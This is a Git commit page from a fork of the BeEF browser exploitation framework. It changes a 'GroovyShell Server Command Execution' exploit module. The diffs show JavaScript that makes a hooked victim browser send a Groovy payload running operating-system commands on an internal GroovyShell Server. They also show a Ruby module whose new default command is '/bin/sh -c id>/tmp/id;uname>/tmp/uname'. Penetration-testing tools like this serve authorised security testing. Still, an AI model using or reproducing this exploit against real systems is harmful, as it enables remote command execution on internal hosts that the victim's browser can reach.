Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add /bin/sh -c to default command

Browse Source
This commit is contained in:
bcoles
2013-05-22 14:37:01 +09:30
parent 7de48ceafb
commit 2dae1d4c07
3 changed files with 3 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
modules/exploits/groovyshell_server_cmd_exec/command.js
View File

@@ -13,7 +13,7 @@ beef.execute(function() {
// validate payload
try {
var cmd = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
var payload = '\r\ndiscard\r\nprintln "'+cmd+'".execute().text\r\ngo\r\nexit\r\n'
var payload = '\r\ndiscard\r\nprintln \''+cmd+'\'.execute().text\r\ngo\r\nexit\r\n'
} catch(e) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
return;

2
modules/exploits/groovyshell_server_cmd_exec/config.yaml
View File

@@ -9,7 +9,7 @@ beef:
enable: true
category: "Exploits"
name: "GroovyShell Server Command Execution"
description: "This module uses the GroovyShell Server interface (default port 6789) to execute operating system commands.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF."
description: "This module uses the GroovyShell Server interface (default port 6789) to execute operating system commands.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF.<br/><br/>Note: Spaces in the command are not supported."
authors: ["bcoles"]
target:
working: ["FF", "C"]

2
modules/exploits/groovyshell_server_cmd_exec/module.rb
View File

@@ -10,7 +10,7 @@ class Groovyshell_server_command_execution < BeEF::Core::Command
{'name'=>'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
{'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '6789'},
{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
{'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute.', 'type'=>'textarea', 'value'=>'id', 'width'=>'200px' },
{'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'/bin/sh -c id>/tmp/id;uname>/tmp/uname', 'width'=>'200px' },
]
end